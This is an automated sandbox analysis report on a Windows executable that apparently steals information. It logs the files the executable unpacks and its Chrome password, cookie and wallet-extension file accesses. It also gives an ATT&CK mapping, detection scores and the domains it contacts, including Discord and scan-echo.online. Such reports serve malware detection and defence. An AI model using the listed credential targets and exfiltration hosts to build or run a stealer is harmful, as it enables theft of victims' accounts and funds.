Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\mpvxolbz VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmpcllxfg7c VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\_pytransform.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\_pytransform.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\_pytransform.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\Desktop\PAP46E1UkZ.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\Desktop\PAP46E1UkZ.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\_sqlite3.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\Desktop\PAP46E1UkZ.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\_hashlib.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\Desktop\PAP46E1UkZ.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\Desktop\PAP46E1UkZ.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\Desktop\PAP46E1UkZ.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\_ssl.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\Desktop\PAP46E1UkZ.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\Desktop\PAP46E1UkZ.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\Desktop\PAP46E1UkZ.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\Desktop\PAP46E1UkZ.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\Desktop\PAP46E1UkZ.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\Desktop\PAP46E1UkZ.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\Desktop\PAP46E1UkZ.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\Desktop\PAP46E1UkZ.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\_queue.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\unicodedata.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\Desktop\PAP46E1UkZ.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\Desktop\PAP46E1UkZ.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\Desktop\PAP46E1UkZ.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\Desktop\PAP46E1UkZ.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\Desktop\PAP46E1UkZ.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\Desktop\PAP46E1UkZ.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\_cffi_backend.cp39-win_amd64.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\Desktop\PAP46E1UkZ.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\Desktop\PAP46E1UkZ.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\Desktop\PAP46E1UkZ.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\Desktop\PAP46E1UkZ.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_raw_ecb.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_raw_cbc.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_raw_cfb.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_raw_ofb.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_raw_ctr.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Util\_strxor.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Hash\_BLAKE2s.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Hash\_SHA1.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Hash\_SHA256.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Hash\_MD5.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_Salsa20.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Protocol\_scrypt.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Util\_cpuid_c.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Hash\_ghash_portable.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Hash\_ghash_clmul.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_raw_ocb.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_raw_aes.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_raw_aesni.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeCode function: 0_2_00007FF735C67BE0 cpuid 0_2_00007FF735C67BE0
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeCode function: 0_2_00007FF735C4AB88 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF735C4AB88
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeCode function: 0_2_00007FF735C63FE4 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF735C63FE4
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeCode function: 1_2_70A7020C GetVersion,GetCurrentThread,1_2_70A7020C

Stealing of Sensitive Information

barindex
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1
Native API		1
Bootkit		11
Process Injection		1
Virtualization/Sandbox Evasion		1
OS Credential Dumping		2
System Time Discovery		Remote Services1
Archive Collected Data		Exfiltration Over Other Network Medium21
Encrypted Channel		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts11
Process Injection		LSASS Memory121
Security Software Discovery		Remote Desktop Protocol1
Data from Local System		Exfiltration Over Bluetooth1
Ingress Tool Transfer		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager1
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
Non-Application Layer Protocol		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)2
Obfuscated Files or Information		NTDS1
Remote System Discovery		Distributed Component Object ModelInput CaptureScheduled Transfer14
Application Layer Protocol		SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
Bootkit		LSA Secrets1
System Network Configuration Discovery		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.common1
Timestomp		Cached Domain Credentials1
File and Directory Discovery		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync25
System Information Discovery		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
PAP46E1UkZ.exe7%VirustotalBrowse

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_ARC4.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_Salsa20.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_chacha20.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_pkcs1_decode.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_raw_aes.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_raw_aesni.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_raw_arc2.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_raw_blowfish.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_raw_cast.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_raw_cbc.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_raw_cfb.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_raw_ctr.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_raw_des.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_raw_des3.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_raw_ecb.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_raw_eksblowfish.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_raw_ocb.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_raw_ofb.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Hash\_BLAKE2b.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Hash\_BLAKE2s.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Hash\_MD2.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Hash\_MD4.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Hash\_MD5.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Hash\_RIPEMD160.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Hash\_SHA1.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Hash\_SHA224.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Hash\_SHA256.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Hash\_SHA384.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Hash\_SHA512.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Hash\_ghash_clmul.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Hash\_ghash_portable.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Hash\_keccak.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Hash\_poly1305.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Math\_modexp.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Protocol\_scrypt.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\PublicKey\_ec_ws.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\PublicKey\_ed25519.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\PublicKey\_ed448.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\PublicKey\_x25519.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Util\_cpuid_c.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Util\_strxor.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\VCRUNTIME140.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\_asyncio.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\_bz2.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\_cffi_backend.cp39-win_amd64.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\_ctypes.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\_decimal.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\_hashlib.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\_lzma.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\_multiprocessing.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\_overlapped.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\_pytransform.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\_queue.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\_socket.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\_sqlite3.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\_ssl.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\_uuid.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\_win32sysloader.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-console-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-datetime-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-debug-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-errorhandling-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-file-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-file-l1-2-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-file-l2-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-handle-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-heap-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-interlocked-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-libraryloader-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-localization-l1-2-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-memory-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-namedpipe-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-processenvironment-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-processthreads-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-processthreads-l1-1-1.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-profile-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-rtlsupport-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-string-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-synch-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-synch-l1-2-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-sysinfo-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-timezone-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-core-util-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-crt-conio-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-crt-convert-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-crt-environment-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-crt-filesystem-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-crt-heap-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-crt-locale-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-crt-math-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-crt-multibyte-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-crt-process-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-crt-runtime-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-crt-stdio-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-crt-string-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-crt-time-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\api-ms-win-crt-utility-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\cryptography\hazmat\bindings\_openssl.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\cryptography\hazmat\bindings\_rust.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI70922\libcrypto-1_1.dll0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
ptb.discord.com0%VirustotalBrowse
scan-echo.online0%VirustotalBrowse
geolocation-db.com0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://crl.dhimyotis.com/certignarootca.crl00%URL Reputationsafe
http://crl.dhimyotis.com/certignarootca.crl00%URL Reputationsafe
https://blog.jaraco.com/skeleton0%URL Reputationsafe
http://crl.dhimyotis.com/certignarootca.crl0%URL Reputationsafe
https://wwww.certigna.fr/autorites/0m0%URL Reputationsafe
https://ebay.com)z$0%Avira URL Cloudsafe
https://coinbase.com)0%Avira URL Cloudsafe
https://discord.com)0%Avira URL Cloudsafe
http://www.cl.cam.ac.uk/~mgk25/iso-time.html0%URL Reputationsafe
https://tiktok.com)0%Avira URL Cloudsafe
https://discord.com)z0%Avira URL Cloudsafe
http://crl.securetrust.com/STCA.crl0%URL Reputationsafe
http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0%URL Reputationsafe
http://www.accv.es000%URL Reputationsafe
https://paypal.com)0%Avira URL Cloudsafe
http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl00%URL Reputationsafe
http://crl.securetrust.com/SGCA.crl00%URL Reputationsafe
https://xbox.com)0%Avira URL Cloudsafe
https://w3c.github.io/html/sec-forms.html#multipart-form-data0%URL Reputationsafe
https://youtube.com)0%Avira URL Cloudsafe
http://crl4.digice0%URL Reputationsafe
https://twitch.com)z0%Avira URL Cloudsafe
https://crunchyroll.com)0%Avira URL Cloudsafe
http://crl.securetrust.com/SGCA.crlts0%Avira URL Cloudsafe
https://superfurrycdn.nl/copy/100%Avira URL Cloudmalware
http://crl.dhimyotis.com/certignarootca.crlG0%Avira URL Cloudsafe
https://gmail.com)z0%Avira URL Cloudsafe
https://paypal.com)z0%Avira URL Cloudsafe
https://coinbase.com)z0%Avira URL Cloudsafe
https://ebay.com)0%Avira URL Cloudsafe
https://roblox.com)z0%Avira URL Cloudsafe
https://hbo.com)z0%Avira URL Cloudsafe
https://binance.com)z0%Avira URL Cloudsafe
https://playstation.com)0%Avira URL Cloudsafe
https://geolocation-db.com/jsonp/102.129.143.430%Avira URL Cloudsafe
https://sellix.io)0%Avira URL Cloudsafe
https://scan-echo.online/persi/0%Avira URL Cloudsafe
https://telegram.com)z0%Avira URL Cloudsafe
https://mahler:8092/site-updates.py0%Avira URL Cloudsafe
https://netflix.com)0%Avira URL Cloudsafe
https://gmail.com)0%Avira URL Cloudsafe
https://outlook.com)0%Avira URL Cloudsafe
https://binance.com)0%Avira URL Cloudsafe
http://crl.securetrust.com/SGCA.crlG0%Avira URL Cloudsafe
https://epicgames.com)z0%Avira URL Cloudsafe
https://youtube.com)z0%Avira URL Cloudsafe
https://spotify.com)0%Avira URL Cloudsafe
https://spotify.com)z0%Avira URL Cloudsafe
https://optifine.net)z0%Avira URL Cloudsafe
https://yahoo.com)z0%Avira URL Cloudsafe
https://scan-echo.online/gra/0%Avira URL Cloudsafe
https://discord.com/api/users/0%Avira URL Cloudsafe
https://steam.com)0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
ptb.discord.com
162.159.128.233
truefalseunknown
api4.ipify.org
173.231.16.76
truefalse
    		high
    scan-echo.online
    		51.91.236.255
    		truefalseunknown
    cdn.discordapp.com
    		162.159.133.233
    		truefalse
      		high
      geolocation-db.com
      		159.89.102.253
      		truefalseunknown
